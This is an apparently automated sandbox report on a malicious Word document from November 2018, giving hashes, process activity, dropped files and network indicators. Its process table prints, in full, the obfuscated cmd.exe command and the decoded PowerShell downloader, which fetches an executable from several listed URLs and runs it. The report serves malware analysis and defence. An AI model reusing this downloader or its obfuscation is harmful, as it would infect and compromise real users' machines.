analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Number - 3M62409657685702.doc |
| Full analysis: | https://app.any.run/tasks/a4122e77-2f71-4ef6-ac06-dab6186af641 |
| Verdict: | Malicious activity |
| Analysis date: | November 14, 2018, 18:50:51 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 17:27:00 2018, Last Saved Time/Date: Wed Nov 14 17:27:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
| MD5: | D06EA3D620D727787801FA62E8A1B713 |
| SHA1: | 9EBC5744A5CA45AE73ED9E30AC552D7CF6EC2D08 |
| SHA256: | A4F49195578FFA5A9E0BEE84D7A0564A1DECF33C26F36A3318E2D555A0AF6CCE |
| SSDEEP: | 1536:+WzqUocn1kp59gxBK85fBt+a9Jx3GxdxoRlBsRghIxgBqx5xfxEBoxtBBB4xWDP:9M41k/W48DxuxoRlBsRghIxgBqx5xfx9 |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2964)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2964)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 3356)
Executes PowerShell scripts
- cmd.exe (PID: 2768)
Reads Internet Cache Settings
- powershell.exe (PID: 3356)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2964)
Creates files in the user directory
- WINWORD.EXE (PID: 2964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:11:14 17:27:00 |
| ModifyDate: | 2018:11:14 17:27:00 |
| Pages: | 1 |
| Words: | 2 |
| Characters: | 13 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 14 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2964 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Number - 3M62409657685702.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 2768 | c:\wvBQHldjVqOM\YYZXLbOZn\HFAKEUwmzJ\..\..\..\windows\system32\cmd.exe /C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^t ^;^]'^+=^8^@&&^s^et ^#`=^B&&^se^t ^}^`?=^h&&^se^t ^]^_\^*=^T&&^s^et '^\^@=N^Th.^t^yp&&s^e^t ^}`=^://^a^ion&&^s^e^t ^_^`~=^ow^er^s^h&&s^e^t {^]^'\=^.^s^en&&^s^e^t ^~^+=)^;$L^Ai^ ^=N^e&&^se^t ^*`^$=k^e^m^a^ler^k^o^l.net&&set ^-#=jZU);^Start&&s^e^t ^~^$^*=^h&&s^e^t ^-*^'=ht^tp^';$N^T^h^ &&^s^et ^]#^?=^om 'ad^o^d^b.^strea^m^'^;f&&s^e^t ^{^*^`}=n&&^s^e^t ^$.^*^}=v^e&&s^e^t ^@,^`=^.&&^se^t ^[+@^-=^$n&&se^t ?^.,^_=(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&se^t $^.=^:/&&^se^t ;^?[^#=/n&&s^e^t ^*[^{^#=^m^ana&&^se^t #^{=n^t/&&^s^et ^,]^~=^o&&^se^t ,^?=^=^ Ne&&^s^et *^?,^\=^.^op&&s^e^t @^\^{=^b0^kQ^7&&^se^t ~^\=c^es&&^s^et ^#^]=^p&&^s^e^t #^.^-^'=^T'^,$Lr^G&&^s^e^t $^{`^@=Q&&^se^t `^]^*~=^p^://^zh^an&&^s^et ^.^3bb5484c-acd3-5883-ae5d-000aa204eed3 }=g^jia^b^ir^dn^e^s&&s^e^t .{-=^h^{&&s^e^t ^#^$^.@=^ ^ ^ ^ &&^se^t ]^-@^[=on^s^eB&&^se^t ^#^?=/&&^s^et ^+^{^\=^e ^=^ 1;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^,^`=com/w^p-c^o&&^se^t .^-=c&&^s^e^t ^\-^@=^ ^-c&&s^e^t ^$^-^+=N&&^s^et ^-*=^i.&&^se^t ^{^+^?^]=n^t^e&&^s^et *^-=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^@^-=^od^y)^;&&s^e^t ^+~^.=^d()^;^$N^Th&&s^e^t ^]}=^x^e'&&set \^]^'=^;$L^Ai&&^s^et ^~^#^@^'=^Obj^ec^t&&^s^e^t ^_^}'?=r&&^s^et @^[^,=r^each(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^$[*^`=()^;&&^se^t ^{~^*=^f)&&^s^e^t ^[^;^#=w^-&&^s^e^t ^,^\{=to^f^i^le&&^se^t '^*=^et^a^.&&^se^t ~^?^]^[=^ ^ &&^s^e^t #^+^*=^h^t^t^p:&&s^e^t ^'^.^#^?='^G^E&&^s^et ^]^`_^@=^$NT^h^.s^a&&^s^et ^{^}=^,0&&se^t ^$^~^[-=r^eak^}&&^s^e^t ^~\^?^}=c&&^s^et ^#^$^,=^y{^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^}^?~^[=co/P^U^x^AY&&^s^e^t ^-^,}^.=-^P&&^se^t @^`=^wr^i^t^e(^$^L^Ai^.r&&^s^e^t ^{^.-=)&&^s^e^t ^,.=^}}^ ^ ^ ^ &&se^t ^~^+^?=^m^@^h^ttp&&^s^e^t ^[_=^.&&^s^e^t {^*=()+^'^\^Kj&&s^e^t @^~=u^p&&s^e^t ^~^_=@')&&^s^et [^}^.=^p^j^x^u'.Sp^l^it(^'&&^se^t ;^[=roc^e^s^s ^$^j^ZU;b&&^s^e^t ;^\^`^*=^h]&&^s^et ^\^-_=^a^tc&&s^e^t ^,}=^L^A&&s^e^t }^\]^[=^e^sp&&s^e^t {^+`=^[S^y^st^e^m.^IO&&^s^e^t ^[^?=^Lr^G ^in^ &&set ^$^@^[=l^o^a^ds/&&^s^e^t \^{^?_=^e&&s^e^t #^.^?=o^m^.^br&&^s^e^t ^+^@^,^.=l^2^.^x^ml&&^s^et ^*^}=^{^t&&^s^e^t '^\^?=t^.&&^s^e^t ^*.=@^ht^t^p://^p&&^s^et ^].=^ ^-c^o^m 'm^s^x^m&&^se^t ^?^~*=;^$j^Z^U^=(&&^se^t ^{?=^i.^o^p^e&&^se^t ^+^*=^:^:^G^et&&s^et [^~#^`=n(&&^se^t ^.^?^]=^Te^mpPa^t&&^se^t ^?^+$=^Y&&^s^e^t ^.}=/&&^s^et ^`^};-=^g^em^e&&s^e^t ^'{=//s^i^tran^t^or.^e^s/^L^d^Lr^6F^8^A@htt^p&&c^al^l ^s^e^t \[?=%^#^]%%^_^`~%%^#}^_%%^[-^.%%`^]^*~%%^.^3bb5484c-acd3-5883-ae5d-000aa204eed3 }%%'^\^?%%^}^?~^[%%^*.%%\^+?^.%%'^*%%.^-%%#^.^?%%^#^?%%@^\^{%%$^{`^@%%^;^]'^+%%#^+^*%%^'{%%^}`%%^*[^{^#%%^`^};-%%^[,*^+%%'^~%%~^\%%^@,^`%%^,^`%%^{^+^?^]%%#^{%%@^~%%^$^@^[%%^~^+^?%%$^.%%^.}%%^*`^$%%;^?[^#%%^?^+$%%[^}^.%%^~^_%%^?^~*%%{^+`%%^#^,^$@%%;^\^`^*%%^+^*%%^.^?^]%%^}^`?%%{^*%%^-*%%'^`^.%%^]}%%^~^+%%^[^;^#%%^~^#^@^'%%^].%%^+^@^,^.%%^-*^'%%,^?%%+^.%%^\-^@%%^]#^?%%^,]^~%%@^[^,%%^[^?%%^[+@^-%%^#`%%^{~^*%%^*^}%%^_^}'?%%^#^$^,%%^,}%%^{?%%[^~#^`%%^'^.^#^?%%#^.^-^'%%^{^}%%^{^.-%%\^]^'%%{^]^'\%%^+~^.%%*^?,^\%%\^{^?_%%^{^*^`}%%^$[*^`%%*^-%%'^\^@%%^+^{^\%%^$^-^+%%^]^_\^*%%^~^$^*%%^[_%%@^`%%}^\]^[%%]^-@^[%%^@^-%%^]^`_^@%%^$.^*^}%%^,^\{%%?^.,^_%%^-#%%^-^,}^.%%;^[%%^$^~^[-%%^~\^?^}%%^\^-_%%.{-%%^,.%%~^?^]^[%%^#^$^.@%&&ca^ll %\[?%"
| c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 3356 | powershell $zZo='Ops';$nBf='http://zhangjiabirdnest.co/PUxAY@http://panelapreta.com.br/b0kQ7Q8@http://sitrantor.es/LdLr6F8A@http://aionmanagementservices.com/wp-content/uploads/m@http://kemalerkol.net/nYpjxu'.Split('@');$jZU=([System.IO.Path]::GetTempPath()+'\Kji.exe');$LAi =New-Object -com 'msxml2.xmlhttp';$NTh = New-Object -com 'adodb.stream';foreach($LrG in $nBf){try{$LAi.open('GET',$LrG,0);$LAi.send();$NTh.open();$NTh.type = 1;$NTh.write($LAi.responseBody);$NTh.savetofile($jZU);Start-Process $jZU;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 348
Read events
947
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR891A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3WKFITDVOI493C23X4OV.temp | — | |
MD5:— | SHA256:— | |||
| 3356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C5E84CFB7FDA503A7F95914AD626D14 | SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D | |||
| 3356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169232.TMP | binary | |
MD5:0C5E84CFB7FDA503A7F95914AD626D14 | SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D | |||
| 2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$mber - 3M62409657685702.doc | pgc | |
MD5:C8CD79B6C6B1B7C8AC80EDB1BD91494C | SHA256:5978BF8549CCBE224A0D7D8E57BD27A4887E359D92CBF900BA3028F833A81E6C | |||
| 2964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:70C278D8BB09C3041479A9BC2AF4E1A9 | SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3356 | powershell.exe | GET | — | 75.98.168.239:80 | http://zhangjiabirdnest.co/PUxAY/ | US | — | — | suspicious |
3356 | powershell.exe | GET | 301 | 75.98.168.239:80 | http://zhangjiabirdnest.co/PUxAY | US | html | 241 b | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3356 | powershell.exe | 75.98.168.239:80 | zhangjiabirdnest.co | A2 Hosting, Inc. | US | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
zhangjiabirdnest.co |
| suspicious |